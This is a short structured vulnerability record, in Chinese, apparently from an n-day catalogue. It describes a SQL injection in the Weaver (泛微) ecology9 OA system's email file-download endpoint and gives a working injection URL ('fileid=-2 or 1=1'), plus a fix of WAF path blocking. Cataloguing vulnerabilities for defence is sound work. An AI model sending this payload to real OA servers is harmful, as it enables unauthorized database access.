vendor = "泛微"
name = "泛微 ecology9 OA 系统SQL注入老洞"
type = "SQL注入"
version = "未知"
path = "weaver/weaver.email.FileDownloadLocation"
detail = "weaver/weaver.email.FileDownloadLocation?download=1&fileid=-2%20or%201=1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0726"
label = "nday"
